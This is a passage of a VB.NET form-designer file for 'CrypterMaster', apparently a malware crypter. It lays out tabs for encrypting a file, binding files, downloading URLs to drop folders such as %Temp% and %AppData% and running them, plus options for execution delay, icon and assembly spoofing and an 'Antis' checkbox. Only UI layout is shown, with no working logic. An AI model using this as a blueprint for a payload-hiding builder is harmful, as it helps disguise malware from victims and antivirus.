Me.Label2.ForeColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.Label2.Location = New System.Drawing.Point(3, 59)
|
||||
Me.Label2.Name = "Label2"
|
||||
Me.Label2.Size = New System.Drawing.Size(103, 17)
|
||||
Me.Label2.TabIndex = 3
|
||||
Me.Label2.Text = "Clave de cifrado"
|
||||
'
|
||||
'btnSeleccionar_Crypter
|
||||
'
|
||||
Me.btnSeleccionar_Crypter.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnSeleccionar_Crypter.BaseColour = System.Drawing.Color.White
|
||||
Me.btnSeleccionar_Crypter.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnSeleccionar_Crypter.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnSeleccionar_Crypter.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnSeleccionar_Crypter.Location = New System.Drawing.Point(428, 23)
|
||||
Me.btnSeleccionar_Crypter.Name = "btnSeleccionar_Crypter"
|
||||
Me.btnSeleccionar_Crypter.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnSeleccionar_Crypter.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnSeleccionar_Crypter.Size = New System.Drawing.Size(71, 29)
|
||||
Me.btnSeleccionar_Crypter.TabIndex = 2
|
||||
Me.btnSeleccionar_Crypter.Text = "Seleccionar"
|
||||
'
|
||||
'txtArchivo_Crypter
|
||||
'
|
||||
Me.txtArchivo_Crypter.BackColor = System.Drawing.Color.Transparent
|
||||
Me.txtArchivo_Crypter.BackgroundColour = System.Drawing.Color.White
|
||||
Me.txtArchivo_Crypter.BorderColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.txtArchivo_Crypter.Location = New System.Drawing.Point(6, 23)
|
||||
Me.txtArchivo_Crypter.MaxLength = 32767
|
||||
Me.txtArchivo_Crypter.Multiline = False
|
||||
Me.txtArchivo_Crypter.Name = "txtArchivo_Crypter"
|
||||
Me.txtArchivo_Crypter.ReadOnly = True
|
||||
Me.txtArchivo_Crypter.Size = New System.Drawing.Size(416, 29)
|
||||
Me.txtArchivo_Crypter.Style = CrypterMaster.HuraTextBox.Styles.Normal
|
||||
Me.txtArchivo_Crypter.TabIndex = 1
|
||||
Me.txtArchivo_Crypter.TextAlign = System.Windows.Forms.HorizontalAlignment.Left
|
||||
Me.txtArchivo_Crypter.TextColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.txtArchivo_Crypter.UseSystemPasswordChar = False
|
||||
'
|
||||
'Label1
|
||||
'
|
||||
Me.Label1.AutoSize = True
|
||||
Me.Label1.ForeColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.Label1.Location = New System.Drawing.Point(3, 3)
|
||||
Me.Label1.Name = "Label1"
|
||||
Me.Label1.Size = New System.Drawing.Size(118, 17)
|
||||
Me.Label1.TabIndex = 0
|
||||
Me.Label1.Text = "Archivo a encriptar"
|
||||
'
|
||||
'TabBinder
|
||||
'
|
||||
Me.TabBinder.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.TabBinder.Controls.Add(Me.comboDrop_Binder)
|
||||
Me.TabBinder.Controls.Add(Me.HuraGroupBox3)
|
||||
Me.TabBinder.Controls.Add(Me.lstArchivos_Binder)
|
||||
Me.TabBinder.Location = New System.Drawing.Point(4, 34)
|
||||
Me.TabBinder.Name = "TabBinder"
|
||||
Me.TabBinder.Padding = New System.Windows.Forms.Padding(3)
|
||||
Me.TabBinder.Size = New System.Drawing.Size(654, 123)
|
||||
Me.TabBinder.TabIndex = 1
|
||||
Me.TabBinder.Text = "Binder"
|
||||
'
|
||||
'comboDrop_Binder
|
||||
'
|
||||
Me.comboDrop_Binder.AccentColor = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.comboDrop_Binder.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.comboDrop_Binder.ColorScheme = CrypterMaster.HuraComboBox.ColorSchemes.Dark
|
||||
Me.comboDrop_Binder.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed
|
||||
Me.comboDrop_Binder.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
|
||||
Me.comboDrop_Binder.Font = New System.Drawing.Font("Segoe UI", 9.5!)
|
||||
Me.comboDrop_Binder.ForeColor = System.Drawing.Color.White
|
||||
Me.comboDrop_Binder.FormattingEnabled = True
|
||||
Me.comboDrop_Binder.Items.AddRange(New Object() {"%App.Path%", "%Temp%", "%AppData%", "%UserProfile%", "%MyDocuments%"})
|
||||
Me.comboDrop_Binder.Location = New System.Drawing.Point(427, 92)
|
||||
Me.comboDrop_Binder.Name = "comboDrop_Binder"
|
||||
Me.comboDrop_Binder.Size = New System.Drawing.Size(219, 25)
|
||||
Me.comboDrop_Binder.TabIndex = 4
|
||||
'
|
||||
'HuraGroupBox3
|
||||
'
|
||||
Me.HuraGroupBox3.BackColor = System.Drawing.Color.White
|
||||
Me.HuraGroupBox3.Controls.Add(Me.chkEjecutar_Binder)
|
||||
Me.HuraGroupBox3.Controls.Add(Me.btnAgregar_Binder)
|
||||
Me.HuraGroupBox3.Controls.Add(Me.btnQuitar_Binder)
|
||||
Me.HuraGroupBox3.Location = New System.Drawing.Point(427, 6)
|
||||
Me.HuraGroupBox3.Name = "HuraGroupBox3"
|
||||
Me.HuraGroupBox3.Size = New System.Drawing.Size(220, 80)
|
||||
Me.HuraGroupBox3.TabIndex = 3
|
||||
Me.HuraGroupBox3.Text = "HuraGroupBox3"
|
||||
'
|
||||
'chkEjecutar_Binder
|
||||
'
|
||||
Me.chkEjecutar_Binder.BaseColour = System.Drawing.Color.White
|
||||
Me.chkEjecutar_Binder.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.chkEjecutar_Binder.Checked = False
|
||||
Me.chkEjecutar_Binder.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.chkEjecutar_Binder.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.chkEjecutar_Binder.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.chkEjecutar_Binder.Location = New System.Drawing.Point(12, 48)
|
||||
Me.chkEjecutar_Binder.Name = "chkEjecutar_Binder"
|
||||
Me.chkEjecutar_Binder.Size = New System.Drawing.Size(130, 22)
|
||||
Me.chkEjecutar_Binder.TabIndex = 3
|
||||
Me.chkEjecutar_Binder.Text = "Ejecutar archivo"
|
||||
Me.chkEjecutar_Binder.Visible = False
|
||||
'
|
||||
'btnAgregar_Binder
|
||||
'
|
||||
Me.btnAgregar_Binder.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnAgregar_Binder.BaseColour = System.Drawing.Color.White
|
||||
Me.btnAgregar_Binder.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnAgregar_Binder.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnAgregar_Binder.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnAgregar_Binder.Location = New System.Drawing.Point(12, 13)
|
||||
Me.btnAgregar_Binder.Name = "btnAgregar_Binder"
|
||||
Me.btnAgregar_Binder.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnAgregar_Binder.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnAgregar_Binder.Size = New System.Drawing.Size(94, 26)
|
||||
Me.btnAgregar_Binder.TabIndex = 1
|
||||
Me.btnAgregar_Binder.Text = "Agregar archivo"
|
||||
'
|
||||
'btnQuitar_Binder
|
||||
'
|
||||
Me.btnQuitar_Binder.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnQuitar_Binder.BaseColour = System.Drawing.Color.White
|
||||
Me.btnQuitar_Binder.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnQuitar_Binder.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnQuitar_Binder.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnQuitar_Binder.Location = New System.Drawing.Point(116, 13)
|
||||
Me.btnQuitar_Binder.Name = "btnQuitar_Binder"
|
||||
Me.btnQuitar_Binder.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnQuitar_Binder.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnQuitar_Binder.Size = New System.Drawing.Size(94, 26)
|
||||
Me.btnQuitar_Binder.TabIndex = 2
|
||||
Me.btnQuitar_Binder.Text = "Quitar archivo"
|
||||
'
|
||||
'lstArchivos_Binder
|
||||
'
|
||||
Me.lstArchivos_Binder.Columns.AddRange(New System.Windows.Forms.ColumnHeader() {Me.colArchivo_Binder, Me.colEjecutar_Binder})
|
||||
Me.lstArchivos_Binder.ForeColor = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.lstArchivos_Binder.FullRowSelect = True
|
||||
Me.lstArchivos_Binder.GridLines = True
|
||||
Me.lstArchivos_Binder.Location = New System.Drawing.Point(3, 6)
|
||||
Me.lstArchivos_Binder.MultiSelect = False
|
||||
Me.lstArchivos_Binder.Name = "lstArchivos_Binder"
|
||||
Me.lstArchivos_Binder.Size = New System.Drawing.Size(418, 111)
|
||||
Me.lstArchivos_Binder.TabIndex = 0
|
||||
Me.lstArchivos_Binder.UseCompatibleStateImageBehavior = False
|
||||
Me.lstArchivos_Binder.View = System.Windows.Forms.View.Details
|
||||
'
|
||||
'colArchivo_Binder
|
||||
'
|
||||
Me.colArchivo_Binder.Text = "Archivo"
|
||||
Me.colArchivo_Binder.Width = 338
|
||||
'
|
||||
'colEjecutar_Binder
|
||||
'
|
||||
Me.colEjecutar_Binder.Text = "Ejecutar"
|
||||
Me.colEjecutar_Binder.Width = 58
|
||||
'
|
||||
'TabDownloader
|
||||
'
|
||||
Me.TabDownloader.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.TabDownloader.Controls.Add(Me.HuraGroupBox4)
|
||||
Me.TabDownloader.Controls.Add(Me.lstArchivos_Downloader)
|
||||
Me.TabDownloader.Controls.Add(Me.comboDrop_Downloader)
|
||||
Me.TabDownloader.Location = New System.Drawing.Point(4, 34)
|
||||
Me.TabDownloader.Name = "TabDownloader"
|
||||
Me.TabDownloader.Size = New System.Drawing.Size(654, 123)
|
||||
Me.TabDownloader.TabIndex = 2
|
||||
Me.TabDownloader.Text = "Downloader"
|
||||
'
|
||||
'HuraGroupBox4
|
||||
'
|
||||
Me.HuraGroupBox4.BackColor = System.Drawing.Color.White
|
||||
Me.HuraGroupBox4.Controls.Add(Me.chkEjecutar_Downloader)
|
||||
Me.HuraGroupBox4.Controls.Add(Me.btnAgregar_Downloader)
|
||||
Me.HuraGroupBox4.Controls.Add(Me.btnQuitar_Downloader)
|
||||
Me.HuraGroupBox4.Location = New System.Drawing.Point(428, 6)
|
||||
Me.HuraGroupBox4.Name = "HuraGroupBox4"
|
||||
Me.HuraGroupBox4.Size = New System.Drawing.Size(220, 80)
|
||||
Me.HuraGroupBox4.TabIndex = 6
|
||||
Me.HuraGroupBox4.Text = "HuraGroupBox4"
|
||||
'
|
||||
'chkEjecutar_Downloader
|
||||
'
|
||||
Me.chkEjecutar_Downloader.BaseColour = System.Drawing.Color.White
|
||||
Me.chkEjecutar_Downloader.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.chkEjecutar_Downloader.Checked = False
|
||||
Me.chkEjecutar_Downloader.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.chkEjecutar_Downloader.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.chkEjecutar_Downloader.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.chkEjecutar_Downloader.Location = New System.Drawing.Point(12, 48)
|
||||
Me.chkEjecutar_Downloader.Name = "chkEjecutar_Downloader"
|
||||
Me.chkEjecutar_Downloader.Size = New System.Drawing.Size(130, 22)
|
||||
Me.chkEjecutar_Downloader.TabIndex = 3
|
||||
Me.chkEjecutar_Downloader.Text = "Ejecutar archivo"
|
||||
Me.chkEjecutar_Downloader.Visible = False
|
||||
'
|
||||
'btnAgregar_Downloader
|
||||
'
|
||||
Me.btnAgregar_Downloader.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnAgregar_Downloader.BaseColour = System.Drawing.Color.White
|
||||
Me.btnAgregar_Downloader.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnAgregar_Downloader.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnAgregar_Downloader.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnAgregar_Downloader.Location = New System.Drawing.Point(12, 13)
|
||||
Me.btnAgregar_Downloader.Name = "btnAgregar_Downloader"
|
||||
Me.btnAgregar_Downloader.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnAgregar_Downloader.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnAgregar_Downloader.Size = New System.Drawing.Size(94, 26)
|
||||
Me.btnAgregar_Downloader.TabIndex = 1
|
||||
Me.btnAgregar_Downloader.Text = "Agregar URL"
|
||||
'
|
||||
'btnQuitar_Downloader
|
||||
'
|
||||
Me.btnQuitar_Downloader.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnQuitar_Downloader.BaseColour = System.Drawing.Color.White
|
||||
Me.btnQuitar_Downloader.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnQuitar_Downloader.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnQuitar_Downloader.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnQuitar_Downloader.Location = New System.Drawing.Point(116, 13)
|
||||
Me.btnQuitar_Downloader.Name = "btnQuitar_Downloader"
|
||||
Me.btnQuitar_Downloader.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnQuitar_Downloader.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnQuitar_Downloader.Size = New System.Drawing.Size(94, 26)
|
||||
Me.btnQuitar_Downloader.TabIndex = 2
|
||||
Me.btnQuitar_Downloader.Text = "Quitar URL"
|
||||
'
|
||||
'lstArchivos_Downloader
|
||||
'
|
||||
Me.lstArchivos_Downloader.Columns.AddRange(New System.Windows.Forms.ColumnHeader() {Me.colURL_Downloader, Me.colExtension_Downloader, Me.colEjecutar_Downloader})
|
||||
Me.lstArchivos_Downloader.ForeColor = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.lstArchivos_Downloader.FullRowSelect = True
|
||||
Me.lstArchivos_Downloader.GridLines = True
|
||||
Me.lstArchivos_Downloader.Location = New System.Drawing.Point(3, 6)
|
||||
Me.lstArchivos_Downloader.MultiSelect = False
|
||||
Me.lstArchivos_Downloader.Name = "lstArchivos_Downloader"
|
||||
Me.lstArchivos_Downloader.Size = New System.Drawing.Size(419, 111)
|
||||
Me.lstArchivos_Downloader.TabIndex = 5
|
||||
Me.lstArchivos_Downloader.UseCompatibleStateImageBehavior = False
|
||||
Me.lstArchivos_Downloader.View = System.Windows.Forms.View.Details
|
||||
'
|
||||
'colURL_Downloader
|
||||
'
|
||||
Me.colURL_Downloader.Text = "URL"
|
||||
Me.colURL_Downloader.Width = 272
|
||||
'
|
||||
'colExtension_Downloader
|
||||
'
|
||||
Me.colExtension_Downloader.Text = "Ext."
|
||||
'
|
||||
'colEjecutar_Downloader
|
||||
'
|
||||
Me.colEjecutar_Downloader.Text = "Ejecutar"
|
||||
Me.colEjecutar_Downloader.Width = 66
|
||||
'
|
||||
'comboDrop_Downloader
|
||||
'
|
||||
Me.comboDrop_Downloader.AccentColor = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.comboDrop_Downloader.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.comboDrop_Downloader.ColorScheme = CrypterMaster.HuraComboBox.ColorSchemes.Dark
|
||||
Me.comboDrop_Downloader.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed
|
||||
Me.comboDrop_Downloader.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
|
||||
Me.comboDrop_Downloader.Font = New System.Drawing.Font("Segoe UI", 9.5!)
|
||||
Me.comboDrop_Downloader.ForeColor = System.Drawing.Color.White
|
||||
Me.comboDrop_Downloader.FormattingEnabled = True
|
||||
Me.comboDrop_Downloader.Items.AddRange(New Object() {"%App.Path%", "%Temp%", "%AppData%", "%UserProfile%", "%MyDocuments%"})
|
||||
Me.comboDrop_Downloader.Location = New System.Drawing.Point(428, 92)
|
||||
Me.comboDrop_Downloader.Name = "comboDrop_Downloader"
|
||||
Me.comboDrop_Downloader.Size = New System.Drawing.Size(219, 25)
|
||||
Me.comboDrop_Downloader.TabIndex = 7
|
||||
'
|
||||
'tabOpciones
|
||||
'
|
||||
Me.tabOpciones.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.tabOpciones.Controls.Add(Me.Label8)
|
||||
Me.tabOpciones.Controls.Add(Me.updwnRetraso)
|
||||
Me.tabOpciones.Controls.Add(Me.btnAssembly)
|
||||
Me.tabOpciones.Controls.Add(Me.btnIcono)
|
||||
Me.tabOpciones.Controls.Add(Me.chkRetraso)
|
||||
Me.tabOpciones.Controls.Add(Me.txtAssembly)
|
||||
Me.tabOpciones.Controls.Add(Me.txtIcono)
|
||||
Me.tabOpciones.Controls.Add(Me.chkAssembly)
|
||||
Me.tabOpciones.Controls.Add(Me.chkIcono)
|
||||
Me.tabOpciones.Controls.Add(Me.chkAntis)
|
||||
Me.tabOpciones.Location = New System.Drawing.Point(4, 34)
|
||||
Me.tabOpciones.Name = "tabOpciones"
|
||||
Me.tabOpciones.Size = New System.Drawing.Size(654, 123)
|
||||
Me.tabOpciones.TabIndex = 3
|
||||
Me.tabOpciones.Text = "Opciones"
|
||||
'
|
||||
'Label8
|
||||
'
|
||||
Me.Label8.AutoSize = True
|
||||
Me.Label8.ForeColor = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.Label8.Location = New System.Drawing.Point(366, 12)
|
||||
Me.Label8.Name = "Label8"
|
||||
Me.Label8.Size = New System.Drawing.Size(65, 17)
|
||||
Me.Label8.TabIndex = 10
|
||||
Me.Label8.Text = "segundos"
|
||||
'
|
||||
'updwnRetraso
|
||||
'
|
||||
Me.updwnRetraso.Enabled = False
|
||||
Me.updwnRetraso.ForeColor = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.updwnRetraso.Location = New System.Drawing.Point(308, 9)
|
||||
Me.updwnRetraso.Name = "updwnRetraso"
|
||||
Me.updwnRetraso.Size = New System.Drawing.Size(55, 24)
|
||||
Me.updwnRetraso.TabIndex = 8
|
||||
'
|
||||
'btnAssembly
|
||||
'
|
||||
Me.btnAssembly.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnAssembly.BaseColour = System.Drawing.Color.White
|
||||
Me.btnAssembly.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnAssembly.Enabled = False
|
||||
Me.btnAssembly.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnAssembly.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnAssembly.Location = New System.Drawing.Point(527, 78)
|
||||
Me.btnAssembly.Name = "btnAssembly"
|
||||
Me.btnAssembly.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnAssembly.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnAssembly.Size = New System.Drawing.Size(116, 29)
|
||||
Me.btnAssembly.TabIndex = 7
|
||||
Me.btnAssembly.Text = "Seleccionar"
|
||||
'
|
||||
'btnIcono
|
||||
'
|
||||
Me.btnIcono.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnIcono.BaseColour = System.Drawing.Color.White
|
||||
Me.btnIcono.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnIcono.Enabled = False
|
||||
Me.btnIcono.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnIcono.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnIcono.Location = New System.Drawing.Point(527, 43)
|
||||
Me.btnIcono.Name = "btnIcono"
|
||||
Me.btnIcono.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnIcono.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnIcono.Size = New System.Drawing.Size(116, 29)
|
||||
Me.btnIcono.TabIndex = 6
|
||||
Me.btnIcono.Text = "Seleccionar"
|
||||
'
|
||||
'chkRetraso
|
||||
'
|
||||
Me.chkRetraso.BaseColour = System.Drawing.Color.White
|
||||
Me.chkRetraso.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.chkRetraso.Checked = False
|
||||
Me.chkRetraso.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.chkRetraso.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.chkRetraso.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.chkRetraso.Location = New System.Drawing.Point(150, 10)
|
||||
Me.chkRetraso.Name = "chkRetraso"
|
||||
Me.chkRetraso.Size = New System.Drawing.Size(151, 22)
|
||||
Me.chkRetraso.TabIndex = 5
|
||||
Me.chkRetraso.Text = "Retraso de ejecución"
|
||||
'
|
||||
'txtAssembly
|
||||
'
|
||||
Me.txtAssembly.BackColor = System.Drawing.Color.Transparent
|
||||
Me.txtAssembly.BackgroundColour = System.Drawing.Color.White
|
||||
Me.txtAssembly.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.txtAssembly.Location = New System.Drawing.Point(150, 78)
|
||||
Me.txtAssembly.MaxLength = 32767
|
||||
Me.txtAssembly.Multiline = False
|
||||
Me.txtAssembly.Name = "txtAssembly"
|
||||
Me.txtAssembly.ReadOnly = True
|
||||
Me.txtAssembly.Size = New System.Drawing.Size(371, 29)
|
||||
Me.txtAssembly.Style = CrypterMaster.HuraTextBox.Styles.Normal
|
||||
Me.txtAssembly.TabIndex = 4
|
||||
Me.txtAssembly.TextAlign = System.Windows.Forms.HorizontalAlignment.Left
|
||||
Me.txtAssembly.TextColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.txtAssembly.UseSystemPasswordChar = False
|
||||
'
|
||||
'txtIcono
|
||||
'
|
||||
Me.txtIcono.BackColor = System.Drawing.Color.Transparent
|
||||
Me.txtIcono.BackgroundColour = System.Drawing.Color.White
|
||||
Me.txtIcono.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.txtIcono.Location = New System.Drawing.Point(150, 43)
|
||||
Me.txtIcono.MaxLength = 32767
|
||||
Me.txtIcono.Multiline = False
|
||||
Me.txtIcono.Name = "txtIcono"
|
||||
Me.txtIcono.ReadOnly = True
|
||||
Me.txtIcono.Size = New System.Drawing.Size(371, 29)
|
||||
Me.txtIcono.Style = CrypterMaster.HuraTextBox.Styles.Normal
|
||||
Me.txtIcono.TabIndex = 3
|
||||
Me.txtIcono.TextAlign = System.Windows.Forms.HorizontalAlignment.Left
|
||||
Me.txtIcono.TextColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.txtIcono.UseSystemPasswordChar = False
|
||||
'
|
||||
'chkAssembly
|
||||
'
|
||||
Me.chkAssembly.BaseColour = System.Drawing.Color.White
|
||||
Me.chkAssembly.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.chkAssembly.Checked = False
|
||||
Me.chkAssembly.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.chkAssembly.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.chkAssembly.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.chkAssembly.Location = New System.Drawing.Point(10, 82)
|
||||
Me.chkAssembly.Name = "chkAssembly"
|
||||
Me.chkAssembly.Size = New System.Drawing.Size(134, 22)
|
||||
Me.chkAssembly.TabIndex = 2
|
